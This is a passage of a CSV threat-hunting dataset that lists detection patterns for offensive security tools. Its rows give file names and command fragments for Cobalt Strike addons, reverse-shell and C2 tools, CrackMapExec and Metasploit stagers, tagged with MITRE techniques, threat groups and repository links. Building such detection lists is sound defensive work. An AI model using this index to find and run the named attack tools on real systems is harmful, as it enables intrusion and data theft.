to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","6076" "*/clipmon/clipmon.sln*",".{0,1000}\/clipmon\/clipmon\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6077" 
"*/clipmon/dll/*",".{0,1000}\/clipmon\/dll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","6078" "*/cliws -l *",".{0,1000}\/cliws\s\-l\s.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","6079" "*/cliws -l 
1000*",".{0,1000}\/cliws\s\-l\s1000.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","6080" "*/cliws -p *",".{0,1000}\/cliws\s\-p\s.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","6081" "*/cliws.exe*",".{0,1000}\/cliws\.exe.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","1","N/A","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","6082" "*/cliws.git*",".{0,1000}\/cliws\.git.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","1","N/A","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","6083" "*/CloakNDaggerC2*",".{0,1000}\/CloakNDaggerC2.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. 
This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","N/A","10","10","17","3","2024-10-09T15:36:46Z","2023-04-28T01:58:18Z","6084" "*/clock-skew.nse*",".{0,1000}\/clock\-skew\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6085" "*/cloud_enum.git*",".{0,1000}\/cloud_enum\.git.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","N/A","6","10","1794","271","2024-10-10T08:16:59Z","2019-05-31T09:14:05Z","6087" "*/cloud_enum.py*",".{0,1000}\/cloud_enum\.py.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","N/A","6","10","1794","271","2024-10-10T08:16:59Z","2019-05-31T09:14:05Z","6088" "*/cloud_enum.txt*",".{0,1000}\/cloud_enum\.txt.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. 
Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","N/A","6","10","1794","271","2024-10-10T08:16:59Z","2019-05-31T09:14:05Z","6089" "*/cloudbrute.yaml*",".{0,1000}\/cloudbrute\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","6090" "*/cloudsploit.git*",".{0,1000}\/cloudsploit\.git.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","6095" "*/clown-newuser.c*",".{0,1000}\/clown\-newuser\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","6096" "*/CLR-Injection.git*",".{0,1000}\/CLR\-Injection\.git.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/3gstudent/CLR-Injection","1","1","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","6097" "*/CLR-Injection_x64.bat*",".{0,1000}\/CLR\-Injection_x64\.bat.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","1","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","6098" "*/CLR-Injection_x86.bat*",".{0,1000}\/CLR\-Injection_x86\.bat.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","1","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","6099" "*/cmd/c2.go*",".{0,1000}\/cmd\/c2\.go.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","6100" "*/cmd/hades/*",".{0,1000}\/cmd\/hades\/.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","1","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","6101" "*/cmd/pico/ssh*",".{0,1000}\/cmd\/pico\/ssh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#linux","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","6102" "*/cmd/reverst/*",".{0,1000}\/cmd\/reverst\/.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","6103" "*/cmd/sish.go*",".{0,1000}\/cmd\/sish\.go.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","6104" "*/cmd_executor/*.go*",".{0,1000}\/cmd_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","6106" "*/cmd_log.txt*",".{0,1000}\/cmd_log\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","6107" "*/cmd_stager*",".{0,1000}\/cmd_stager.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6108" "*/CmdLineSpoofer.git*",".{0,1000}\/CmdLineSpoofer\.git.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","6109" "*/CmdLineSpoofer/*.cs*",".{0,1000}\/CmdLineSpoofer\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","6110" "*/cmdstager/*",".{0,1000}\/cmdstager\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6111" "*/cme smb *",".{0,1000}\/cme\ssmb\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","#linux","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","6112" "*/cme winrm *",".{0,1000}\/cme\swinrm\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","#linux","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","6113" "*/cme_adcs_output_*.txt*",".{0,1000}\/cme_adcs_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6114" "*/cme_shares_output_*",".{0,1000}\/cme_shares_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6115" "*/cme_spooler_output_*",".{0,1000}\/cme_spooler_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6116" "*/cmedb",".{0,1000}\/cmedb","offensive_tool_keyword","crackmapexec","windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","6117" "*/CMLoot.git*",".{0,1000}\/CMLoot\.git.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","6118" "*/CMLoot.ps1*",".{0,1000}\/CMLoot\.ps1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","6119" "*/CMSeek*",".{0,1000}\/CMSeek.{0,1000}","offensive_tool_keyword","CMSeek","CMS Detection and Exploitation suite - Scan WordPress. Joomla. 
Drupal and 130 other CMSs.","T1553 - T1580 - T1583 - T1584 ","TA0007","N/A","N/A","Vulnerability Scanner","https://github.com/Tuhinshubhra/CMSeek","1","0","N/A","N/A","N/A","10","2409","507","2024-04-09T13:40:52Z","2018-06-14T00:15:51Z","6120" "*/cmstp_uac.ahk*",".{0,1000}\/cmstp_uac\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","6121" "*/CN=dnsKIRE.local*",".{0,1000}\/CN\=dnsKIRE\.local.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","6122" "*/cna/pipetest.cna*",".{0,1000}\/cna\/pipetest\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 
- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","N/A","10","10","116","23","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z","6123" "*/co2-cewler/*",".{0,1000}\/co2\-cewler\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","6124" "*/co2-core/*",".{0,1000}\/co2\-core\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","6125" "*/co2-laudanum/*",".{0,1000}\/co2\-laudanum\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to 
Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","6126" "*/co2-sqlmapper/*",".{0,1000}\/co2\-sqlmapper\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","6127" "*/coap-resources.nse*",".{0,1000}\/coap\-resources\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6128" "*/cobaltclip.c*",".{0,1000}\/cobaltclip\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 
- T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","6129" "*/cobaltclip.o*",".{0,1000}\/cobaltclip\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 